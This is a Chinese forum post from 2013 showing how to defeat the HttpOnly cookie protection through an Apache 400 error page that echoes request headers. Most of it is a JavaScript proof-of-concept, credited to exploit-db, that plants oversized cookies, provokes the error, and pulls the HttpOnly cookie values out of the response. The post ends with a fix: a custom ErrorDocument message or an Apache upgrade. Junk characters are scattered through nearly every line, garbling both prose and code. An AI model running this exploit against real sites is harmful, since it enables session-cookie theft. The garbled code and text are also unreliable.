很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。& W& Y/ r( f/ v/ m: X& H2 m# N
# C1 |+ P+ @* c5 w( W
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
# C9 Q, Z9 D! y8 x) h0 k- m! b5 h f3 G& D4 ~: j, B, t
2 }7 m/ o: q) _: z" K// http://www.exploit-db.com/exploits/18442/
4 Z" E, n* I5 {* \- v' ufunction setCookies (good) {4 b1 I+ _* |! N9 r/ d
// Construct string for cookie value; b4 T2 J! b. ?8 A, T. I- z
var str = "";& |( S! q H# ?; g6 |! A
for (var i=0; i< 819; i++) {, j. [9 K/ B0 ^+ L6 o& C% X( B/ h
str += "x";/ m. j! \% w2 _) U
}
! Z9 k9 q/ Y, x. q2 R: q4 q" H" R0 Y. ~// Set cookies
0 o; i* ?# Q: V7 p( cfor (i = 0; i < 10; i++) {
$ L* {. M' c0 F6 j" \* h0 x0 @// Expire evil cookie
4 z ]; X% D1 f4 Jif (good) {
z- }# K( v$ Q8 E p$ G, ?+ Jvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";: ^7 Z3 P- [# ^6 c+ L! ~- t# _
}
4 ?6 Q6 N0 Z8 U x; G( z// Set evil cookie! ?7 Z# k% k/ f. W; n' j
else {
- v) r* @! w& G9 Q: q" q V5 Q9 ^1 Yvar cookie = "xss"+i+"="+str+";path=/";, e' O) M4 }8 x# C; P: a
}- h# j4 ?. ?9 b
document.cookie = cookie;
! ^0 w9 B: n/ i$ g' V0 `}! }$ a( q+ j& t3 X
}
+ W+ f/ V6 y& ]0 Afunction makeRequest() { s3 v5 k, N) Y; z+ S& h
setCookies();$ B% c( N9 |" a s k5 H- e- A+ ]
function parseCookies () {
b9 G' C) ~9 D- U A; V' Rvar cookie_dict = {};, l c& r; x; a* I3 [
// Only react on 400 status
! H. r0 B7 W# O0 h4 ?$ Xif (xhr.readyState === 4 && xhr.status === 400) {
+ p; }! Z+ C9 C/ L/ i+ h// Replace newlines and match <pre> content
- S% J- U# e- i9 Ovar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);7 j- g# G" _6 Z0 k/ r! q. @; S
if (content.length) {
" \" w) \1 ~0 d8 r3 o1 \* P9 {// Remove Cookie: prefix0 }: I$ p7 c% r
content = content[1].replace("Cookie: ", "");
+ i6 q3 @8 T3 R0 V1 hvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
7 n' u, k# _4 `5 ]9 `// Add cookies to object4 D, c m# n; {2 p
for (var i=0; i<cookies.length; i++) {4 v8 S; j$ u& w$ ?) j
var s_c = cookies.split('=',2);
8 |/ J' w/ |; V1 i5 X. U) I% ]cookie_dict[s_c[0]] = s_c[1];
" T, W) m5 _8 X6 X9 L0 `}
% Y: n4 V: b/ ]& f/ ?}5 q& C; @" c9 P! z! ~- N2 R
// Unset malicious cookies" u: T% L# W9 m# Y0 ]) [; x
setCookies(true);
" O- q, M: J% palert(JSON.stringify(cookie_dict));0 }% Q8 L: }. [9 @; C) ~
}4 V+ V$ D, F1 [/ D+ K+ u6 O" v0 S3 k
}
' r/ I+ R& N$ m9 J- `$ U// Make XHR request
- h3 p( z& H% Z# i! U7 [% Vvar xhr = new XMLHttpRequest();
; C! ^7 B& `$ \+ m6 Dxhr.onreadystatechange = parseCookies;
% z1 l0 P, B' w4 kxhr.open("GET", "/", true);" o* d! s* n% j7 a' S" b, O. ?
xhr.send(null);- [' v9 k0 R4 a6 P$ S- e: ~! O
}- x; ]) J3 F( Z: @8 Y
makeRequest();
" i) s( h( N4 y- ~5 ]# }, v7 D; x
6 r6 q5 u( X* U' _, W" }你就能看见华丽丽的400错误包含着cookie信息。
2 R7 t& l7 C( V! {4 J
' |6 }" P0 I) x9 y- r下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
* W/ `1 q, J% U0 X% [- X+ V/ H# l# Z) O1 i3 y4 z- k
修复方案:( t, I) [; |* P- v, Z( F4 h
1 {; y6 {/ A6 cApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下+ g# C/ a4 c7 d7 O! t: y2 s8 A, G
4 H! R# X) K8 c2 X
In the event of a problem or error, Apachecan be configured to do one of four things,
. T9 S7 ^ N0 q6 \: X* p: ^2 @& u
. d# i% e# F" ]" F: i, b2 M, A& u5 T4 g1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
$ G. f1 X4 C) ]: v2. output acustomized message输出一段信息
# n0 ~7 s# h: z0 r+ h7 \% V3 G7 D; D3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
0 } x: S% w4 O. _; J4. redirect to an external URL to handle theproblem/error转向一个外部URL
( | ]5 X; k+ V6 E- e& O
2 D. U v5 r/ a1 Z8 h经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容7 s8 d# [5 @ [( ?5 i
; o% H; h! D; v- L. I& M/ [Apache配置:
! l9 x- P2 e0 y( ~2 p
' D3 l7 m6 ~: Q* K# xErrorDocument400 " security test"
; X3 P; f1 N0 T' B7 p
& M3 @$ d; N3 F- n* M2 g当然,升级apache到最新也可:)。
, ]+ v, O* P0 l2 d x$ ~- l
k5 U# _7 W) K. l4 }9 T9 u* i3 V9 N参考:http://httpd.apache.org/security/vulnerabilities_22.html9 a0 `9 ?/ J# K
( s& A: ]/ E+ D' z* a, h |
发表于 2013-4-19 19:15:43
收藏
支持
反对